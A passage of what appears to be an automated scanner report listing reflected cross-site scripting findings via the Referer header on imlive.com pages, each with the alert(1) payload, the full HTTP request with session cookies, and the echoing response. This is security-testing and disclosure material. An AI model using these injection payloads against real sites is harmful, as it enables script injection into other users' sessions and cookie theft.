Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:20 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=n3rd2q45ehprj445d1b53wnr; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:20 GMT; path=/
Set-Cookie: spvdr=vd=66658cff-7513-44e5-b0ab-43cb696f464f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:20 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:20 GMT
Connection: close
Content-Length: 18603
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=fr.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=8655a'-alert(1)-'b1450d4e902&iy=dallas&id=44&iu=1&vd=66658cff-7513-44e5-b0ab-43cb696f464f';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.185. http://fr.imlive.com/waccess/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82729'-alert(1)-'0751f493bff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=82729'-alert(1)-'0751f493bff

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=h1mmxpmwhy5mtf45pdkrf0bs; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=h1mmxpmwhy5mtf45pdkrf0bs; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:25 GMT; path=/
Set-Cookie: spvdr=vd=a562a319-9a57-49cf-9551-42caa14fd03b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:25 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:24 GMT
Connection: close
Content-Length: 21030
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/login.aspx&he=fr.imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=82729'-alert(1)-'0751f493bff&iy=dallas&id=44&iu=1&vd=a562a319-9a57-49cf-9551-42caa14fd03b';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.186. http://gr.imlive.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28ad3'-alert(1)-'7c8c16b05d7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=28ad3'-alert(1)-'7c8c16b05d7

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rd0er4vsfoczxdmbrfuaqi55; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:24 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rd0er4vsfoczxdmbrfuaqi55; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:24 GMT; path=/
Set-Cookie: spvdr=vd=5cee6a4d-0187-4b8e-8517-bb8f3cde3c02&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:24 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:24 GMT
Connection: close
Content-Length: 20541
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=gr.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=28ad3'-alert(1)-'7c8c16b05d7&iy=dallas&id=44&iu=1&vd=5cee6a4d-0187-4b8e-8517-bb8f3cde3c02';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.187. http://gr.imlive.com/waccess/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81a10'-alert(1)-'0b760eb3fe0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=81a10'-alert(1)-'0b760eb3fe0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=2zgid3yqvmew5czs5zzlfbfr; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:30 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2zgid3yqvmew5czs5zzlfbfr; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:30 GMT; path=/
Set-Cookie: spvdr=vd=a0b49277-e905-4eb6-a507-32e282c3c02f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:30 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:30 GMT
Connection: close
Content-Length: 253495
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=gr.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=81a10'-alert(1)-'0b760eb3fe0&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=a0b49277-e905-4eb6-a507-32e282c3c02f';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

2.188. http://imlive.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8adbd'-alert(1)-'4f9aafda70b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=8adbd'-alert(1)-'4f9aafda70b

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0W5s89nS82L1Y30bT54fyWa09YbZxWHM4PkcHt5cVPiM; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:46 GMT
Connection: close
Content-Length: 19013
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/homepage.aspx&he=imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=8adbd'-alert(1)-'4f9aafda70b&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.189. http://imlive.com/GuestDiscountClubs.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /GuestDiscountClubs.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c53c'-alert(1)-'71f23548084 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GuestDiscountClubs.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=3c53c'-alert(1)-'71f23548084

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:00 GMT
Connection: close
Content-Length: 40625
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=3c53c'-alert(1)-'71f23548084&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.190. http://imlive.com/SiteInformation.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /SiteInformation.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a8e5'><script>alert(1)</script>0a7d7dac8a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /SiteInformation.html HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=7a8e5'><script>alert(1)</script>0a7d7dac8a3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:46 GMT
Connection: close
Content-Length: 28320
Vary: Accept-Encoding


<html>
<head>
<meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/live-sex-chats/terminology/&lr=1107816009&ud=0&pe=siteinformation.asp&rf=http://www.google.com/search?hl=en^q=7a8e5'><script>alert(1)</script>0a7d7dac8a3&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.191. http://imlive.com/awardarena/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /awardarena/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46fbb'-alert(1)-'f6926b45b35 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /awardarena/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=46fbb'-alert(1)-'f6926b45b35

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 24721
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostawards.aspx&he=imlive.com&ul=/awardarena/&rf=http://www.google.com/search?hl=en^q=46fbb'-alert(1)-'f6926b45b35&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.192. http://imlive.com/become_celeb.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /become_celeb.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f517a'><script>alert(1)</script>7528764405c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /become_celeb.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=f517a'><script>alert(1)</script>7528764405c

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:00 GMT
Server: Microsoft-IIS/7.0
